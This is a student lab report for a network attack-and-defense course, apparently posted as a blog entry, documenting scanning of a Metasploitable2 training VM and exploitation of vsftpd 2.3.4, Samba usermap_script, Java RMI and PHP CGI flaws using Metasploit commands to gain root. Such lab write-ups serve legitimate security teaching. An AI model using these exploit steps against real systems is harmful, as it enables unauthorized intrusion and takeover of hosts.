20232319 2025-2026-1 《网络与系统攻防技术》实验六实验报告

1.实验内容

(1)前期渗透,metaspoitable2靶机发现
(2)Vsftpd源码包后门漏洞
(3)SambaMS-RPC Shell命令注入漏洞
(4)Java RMI SERVER命令执行漏洞
(5)PHP CGI参数执行注入漏洞

2.实验过程

2.1前期渗透

2.1.1主机发现

在靶机中输入ifconfig,得到靶机IP地址,192.168.190.151
image

在kali虚拟机中使用metaspoit的arp搜索模块

sudo msfconsole #本次扫描需要使用到超级用户权限
serach arp_sweep
use 0 
set rhosts 192.168.190.0/24

image
根据扫描结果,得知靶机192.168.190.151是一个vmware虚拟机

2.1.2端口扫描

使用nmap扫描
nmap -sS -sV 192.168.190.151
image

使用metaspoit扫描

use auxiliary/scanner/portscan/tcp  #tcp扫描模块
set RHOSTS 192.168.3.41    
run   

image

2.1.3扫描系统版本与漏洞

使用nmap -O 192.168.190.151进行扫描获取版本,发现版本为Linux 2.6

image

使用nmap --script vuln 192.168.190.151扫描漏洞,以下漏洞太多,只列举出5个

  • tcp 21端口漏洞,发现vsftpd版本,下面使用有用到
    image

  • tcp 22端口漏洞 ssh服务
    image

  • tcp 25端口漏洞 smtp服务
    image

  • tcp 53端口 domain服务
    image

tcp 80端口 http服务
image

使用nessus扫描漏洞,与nmap扫描结果差不多
image

2.2 Vsftpd源码包后门漏洞(21端口)

在之前的扫描中已经确定Vsftpd版本,直接根据版本选定对应漏洞

use exploit/unix/ftp/vsftpd_234_backdoor 
set RHOST 192.168.179.142  
exploit  

攻击成功
image

2.3 SambaMS-RPC Shell命令注入漏洞(端口139)

use exploit/multi/samba/usermap_script

set RHOST 192.168.190.151 

exploit 

image

2.4 Java RMI SERVER命令执行漏洞(1099端口)

nmap -p 1099 192.168.151发现1099端口开放

image

use exploit/multi/misc/java_rmi_server

set RHOST 192.168.190.151

exploit

成功攻击
image

image

输入whoami发现已获取root权限
image

2.5 PHP CGI参数执行注入漏洞(80端口)

use exploit/multi/http/php_cgi_arg_injection

set RHOST 192.168.190.151

exploit

攻击成功
image

3.学习感悟、思考等

本次实验较为简单,要说最大的收获,就是获得了一个漏洞百出的靶机,便于以后关于metasploit的实验与训练。

参考资料

Metaspoitable2靶机学习

posted @ 2025-11-17 17:13  20232319黄津  阅读(8)  评论(0)    收藏  举报